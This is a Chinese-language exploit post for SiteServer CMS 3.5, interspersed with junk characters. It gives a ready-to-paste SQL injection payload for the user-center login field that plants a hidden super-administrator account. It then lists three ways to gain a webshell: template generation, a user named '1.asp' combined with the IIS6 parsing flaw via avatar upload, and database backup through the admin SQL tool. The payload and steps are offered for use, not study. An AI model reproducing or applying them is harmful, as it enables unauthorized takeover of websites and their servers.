经测试秒杀最新的3.5版$ {; A; m# d% x \
stieserver官网:www.siteserver.cn" d7 J) S: @; o2 O# G& |' ^$ J' @
EXP:) ]0 b4 R" [1 d. I
直接访问UserCenter/login.aspx& I/ {$ R5 w- r0 @3 k0 k. u+ y& \
用户名处输入:
( }: N4 \2 U; R" T9 S9 O( j$ J6 ^% O* E
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
' D* s+ D" s' {% X/ F) d; s8 y密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。5 _# p) u# p9 }9 e% Y4 P
之后再访问后台SiteServer/login.aspx用插入的用户登陆% `- T. y5 K. j
后台拿webshell的三种方法:0 j& H$ X1 C; d. Q7 N/ k
一、" f- \6 K0 [. ]
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx {1 p; G! x6 w
二、' O; ]5 G c7 t- D6 ^
成员权限-》添加用户-》用户名为:1.asp! O, ]# }$ w% \6 e3 y
http://127.0.0.1/usercenter/
# H$ m. }" j2 c; P% L用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
9 N6 O) s9 X* s3 z(ps:后台添加用户时不会验证是否含有非法字符): k7 n7 a' M1 H7 k; B( n7 K
三、5 T4 ?: q* U D6 ]( c
系统工具-》实用工具-》机器参数查看
0 r4 b' J, D) i! B可以看到数据库类型、名称,WEB路径$ ^: w( F6 ~) F" M0 @$ |
系统工具-》数据库工具-》SQL语句查询+ N* ~' f& v7 R: N
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |